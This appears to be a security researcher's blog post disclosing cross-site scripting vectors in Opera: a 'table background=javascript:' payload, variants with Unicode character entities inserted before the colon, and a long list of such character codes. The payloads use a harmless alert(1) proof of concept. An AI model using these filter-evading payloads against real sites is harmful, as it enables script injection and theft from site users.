Opera XSS vectors

It turns out I was right. Originally I thought the protocols reported by my javascript fuzzer were false positives but as like lots of my code it seems to know better than me :) I tested the context of the vectors in a normal HTML link which didn't work correctly. But I was messing with some XSS in Hackvertor today with the latest copy of Opera and I found they worked.

Surprisingly Opera still supports the table background vector and combining my protocol discoveries you can create some cool additional vectors. The table background vector looks like this:-

<pre lang="javascript"> &lt;table background=javascript:alert(1)&gt; </pre>

Now we can combine it with some of the unicode characters that work after the javascript string and before the colon:-

<pre lang="javascript"> &lt;table background=javascript&amp;#14848:alert(1)&gt; </pre>

The characters can be repeated many times like this:-

<pre lang="javascript"> &lt;table background=javascript&amp;#14848&amp;#14848&amp;#14848&amp;#14848&amp;#14848:alert(1)&gt; </pre>

Lots of other characters seem to be affected, I've randomly tested a few like 11520 but I haven't verified them all. Here are a list of the characters:-

<pre lang="javascript"> Char:9,Link:javascript&#9: Char:10,Link:javascript&#10: Char:13,Link:javascript&#13: Char:58,Link:javascript&#58: Char:2048,Link:javascript&#2048: Char:2304,Link:javascript&#2304: Char:3840,Link:javascript&#3840: Char:4096,Link:javascript&#4096: Char:4256,Link:javascript&#4256: Char:4352,Link:javascript&#4352: Char:4608,Link:javascript&#4608: Char:4864,Link:javascript&#4864: Char:5120,Link:javascript&#5120: Char:5376,Link:javascript&#5376: Char:5632,Link:javascript&#5632: Char:5888,Link:javascript&#5888: Char:6400,Link:javascript&#6400: Char:6656,Link:javascript&#6656: Char:7424,Link:javascript&#7424: Char:7936,Link:javascript&#7936: Char:7944,Link:javascript&#7944: Char:11520,Link:javascript&#11520: Char:12544,Link:javascript&#12544: Char:13312,Link:javascript&#13312: Char:13568,Link:javascript&#13568: Char:13824,Link:javascript&#13824: Char:14080,Link:javascript&#14080: Char:14336,Link:javascript&#14336: Char:14592,Link:javascript&#14592: Char:14848,Link:javascript&#14848: Char:15104,Link:javascript&#15104: Char:15360,Link:javascript&#15360: Char:15616,Link:javascript&#15616: Char:15872,Link:javascript&#15872: Char:16128,Link:javascript&#16128: Char:16384,Link:javascript&#16384: Char:16640,Link:javascript&#16640: Char:16896,Link:javascript&#16896: Char:17152,Link:javascript&#17152: Char:17408,Link:javascript&#17408: Char:17664,Link:javascript&#17664: Char:17920,Link:javascript&#17920: Char:18176,Link:javascript&#18176: Char:18432,Link:javascript&#18432: Char:18688,Link:javascript&#18688: Char:18944,Link:javascript&#18944: Char:19200,Link:javascript&#19200: Char:19456,Link:javascript&#19456: Char:19712,Link:javascript&#19712: Char:19968,Link:javascript&#19968: Char:20224,Link:javascript&#20224: Char:20480,Link:javascript&#20480: Char:20736,Link:javascript&#20736: Char:20992,Link:javascript&#20992: Char:21248,Link:javascript&#21248: Char:21504,Link:javascript&#21504: Char:21760,Link:javascript&#21760: Char:22016,Link:javascript&#22016: Char:22272,Link:javascript&#22272: Char:22528,Link:javascript&#22528: Char:22784,Link:javascript&#22784: Char:23040,Link:javascript&#23040: Char:23296,Link:javascript&#23296: Char:23552,Link:javascript&#23552: Char:23808,Link:javascript&#23808: Char:24064,Link:javascript&#24064: Char:24320,Link:javascript&#24320: Char:24576,Link:javascript&#24576: Char:24832,Link:javascript&#24832: Char:25088,Link:javascript&#25088: Char:25344,Link:javascript&#25344: Char:25600,Link:javascript&#25600: Char:25856,Link:javascript&#25856: Char:26112,Link:javascript&#26112: Char:26368,Link:javascript&#26368: Char:26624,Link:javascript&#26624: Char:26880,Link:javascript&#26880: Char:27136,Link:javascript&#27136: Char:27392,Link:javascript&#27392: Char:27648,Link:javascript&#27648: Char:27904,Link:javascript&#27904: Char:28160,Link:javascript&#28160: Char:28416,Link:javascript&#28416: Char:28672,Link:javascript&#28672: Char:28928,Link:javascript&#28928: Char:29184,Link:javascript&#29184: Char:29440,Link:javascript&#29440: Char:29696,Link:javascript&#29696: Char:29952,Link:javascript&#29952: Char:30208,Link:javascript&#30208: Char:30464,Link:javascript&#30464: Char:30720,Link:javascript&#30720: Char:30976,Link:javascript&#30976: Char:31232,Link:javascript&#31232: Char:31488,Link:javascript&#31488: Char:31744,Link:javascript&#31744: Char:32000,Link:javascript&#32000: Char:32256,Link:javascript&#32256: Char:32512,Link:javascript&#32512: Char:32768,Link:javascript&#32768: Char:33024,Link:javascript&#33024: Char:33280,Link:javascript&#33280: Char:33536,Link:javascript&#33536: Char:33792,Link:javascript&#33792: Char:34048,Link:javascript&#34048: Char:34304,Link:javascript&#34304: Char:34560,Link:javascript&#34560: Char:34816,Link:javascript&#34816: Char:35072,Link:javascript&#35072: Char:35328,Link:javascript&#35328: Char:35584,Link:javascript&#35584: Char:35840,Link:javascript&#35840: Char:36096,Link:javascript&#36096: Char:36352,Link:javascript&#36352: Char:36608,Link:javascript&#36608: Char:36864,Link:javascript&#36864: Char:37120,Link:javascript&#37120: Char:37376,Link:javascript&#37376: Char:37632,Link:javascript&#37632: Char:37888,Link:javascript&#37888: Char:38144,Link:javascript&#38144: Char:38400,Link:javascript&#38400: Char:38656,Link:javascript&#38656: Char:38912,Link:javascript&#38912: Char:39168,Link:javascript&#39168: Char:39424,Link:javascript&#39424: Char:39680,Link:javascript&#39680: Char:39936,Link:javascript&#39936: Char:40192,Link:javascript&#40192: Char:40448,Link:javascript&#40448: Char:40704,Link:javascript&#40704: Char:40960,Link:javascript&#40960: Char:41216,Link:javascript&#41216: Char:41472,Link:javascript&#41472: Char:41728,Link:javascript&#41728: Char:41984,Link:javascript&#41984: Char:43008,Link:javascript&#43008: Char:44032,Link:javascript&#44032: Char:44288,Link:javascript&#44288: Char:44544,Link:javascript&#44544: Char:44800,Link:javascript&#44800: Char:45056,Link:javascript&#45056: Char:45312,Link:javascript&#45312: Char:45568,Link:javascript&#45568: Char:45824,Link:javascript&#45824: Char:46080,Link:javascript&#46080: Char:46336,Link:javascript&#46336: Char:46592,Link:javascript&#46592: Char:46848,Link:javascript&#46848: Char:47104,Link:javascript&#47104: Char:47360,Link:javascript&#47360: Char:47616,Link:javascript&#47616: Char:47872,Link:javascript&#47872: Char:48128,Link:javascript&#48128: Char:48384,Link:javascript&#48384: Char:48640,Link:javascript&#48640: Char:48896,Link:javascript&#48896: Char:49152,Link:javascript&#49152: Char:49408,Link:javascript&#49408: Char:49664,Link:javascript&#49664: Char:49920,Link:javascript&#49920: Char:50176,Link:javascript&#50176: Char:50432,Link:javascript&#50432: Char:50688,Link:javascript&#50688: Char:50944,Link:javascript&#50944: Char:51200,Link:javascript&#51200: Char:51456,Link:javascript&#51456: Char:51712,Link:javascript&#51712: Char:51968,Link:javascript&#51968: Char:52224,Link:javascript&#52224: Char:52480,Link:javascript&#52480: Char:52736,Link:javascript&#52736: Char:52992,Link:javascript&#52992: Char:53248,Link:javascript&#53248: Char:53504,Link:javascript&#53504: Char:53760,Link:javascript&#53760: Char:54016,Link:javascript&#54016: Char:54272,Link:javascript&#54272: Char:54528,Link:javascript&#54528: Char:54784,Link:javascript&#54784: Char:55040,Link:javascript&#55040: </pre>